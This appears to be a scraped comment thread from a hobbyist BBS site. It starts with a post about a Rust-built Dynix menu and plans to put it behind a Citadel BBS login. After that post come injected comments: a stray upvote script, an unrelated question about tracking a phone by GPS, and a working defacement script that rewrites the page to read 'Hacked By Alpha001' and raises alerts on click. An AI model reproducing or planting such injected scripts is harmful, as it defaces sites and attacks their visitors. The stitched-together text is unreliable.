I wasn't quite sure what way would be preferable, it could be changed yeah. The Dynix menu is a bit of rust code I hacked together:
https://twitter.com/SegHaxx/status/1521992901210771456
But what I really want to do is put the Dynix menu behind the BBS login, so that curdle could be made to track stats per user, do player rankings and whatnot... this would require hacking up the citadel client a bit, a codebase I've only begun digging in to...
the dynix menu is a super slick tough, though I imagine line mode terminals do NOT aprreciate it lol
have a good day!!
<script>upvote()</script>
how can I track a phone number using GPS?
<script>
document.head.innerHTML = `<style>* {
margin: 0;
padding: 0;
}
.hacked {
background: black;
color: lime;
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
text-align: center;
font-size: 3rem;
flex-direction: column;
}
.hacked img {
margin-top: 20px;
width: 200px;
height: auto;
}</style>`;
document.body.innerHTML = `
<div class="hacked">
<h1>Hacked By Alpha001</h1>
<img src="https://ibb.co/J3pr8jN" alt="Hacked Image">
</div>
`;
window.addEventListener('click', e => alert('You have been hacked by Alpha001'));
</script>